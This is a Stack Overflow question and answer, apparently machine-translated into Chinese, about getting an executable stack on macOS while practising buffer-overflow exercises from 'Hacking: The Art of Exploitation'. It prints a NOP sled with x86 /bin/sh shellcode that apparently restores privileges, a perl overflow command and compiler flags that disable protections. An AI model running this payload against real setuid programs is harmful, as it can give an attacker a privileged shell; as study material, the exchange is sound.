如何在osx上使堆栈可执行?

时间:2017-02-19 20:23:33

标签: c macos security gcc shellcode

我目前正在经历“黑客攻击的艺术”,并正在练习编写我编写的一些示例代码的shell代码注入。

我正在将shell代码注入环境变量。在lldb中,我可以看到我正在覆盖返回地址,并且EIP被设置为我的NOP雪橇的中间位置。但是,它会抛出“EXC_BAD_ACCESS”和段错误。

这是我的shellcode的堆栈部分:

0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"

调用lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40')执行缓冲区溢出,这是我们在segfaults时获得的内容:

Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
    frame #0: 0xbffffc5e
->  0xbffffc5e: nop    
    0xbffffc5f: nop    
    0xbffffc60: nop    
    0xbffffc61: nop

我正在使用 gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer 编译代码,我使用change_mach_o_flags.py script设置了--no-pie--executable-heap选项。

认为问题是osx自动将堆栈设置为不可执行。不幸的是,osx中的gcc似乎没有-z execstack选项。还没有execstack实用程序可供使用。

我已经在网上搜索过,无论如何都无法找到我的编译代码中的堆栈可执行文件。有没有办法做到这一点,如果有,怎么做?

1 个答案:

答案 0 :(得分:5)

来自Apple开发者文档:

  

有两种方法可以使堆栈和堆可执行:

     

将-allow_stack_execute标志传递给编译器。这使得   堆栈(不是堆)可执行文件。

     

使用mprotect系统调用来标记   特定内存页面可执行。细节超出了范围   这份文件。有关更多信息,请参阅手册页   mprotect的。

查看更多:https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Articles/BufferOverflows.html

相关问题
最新问题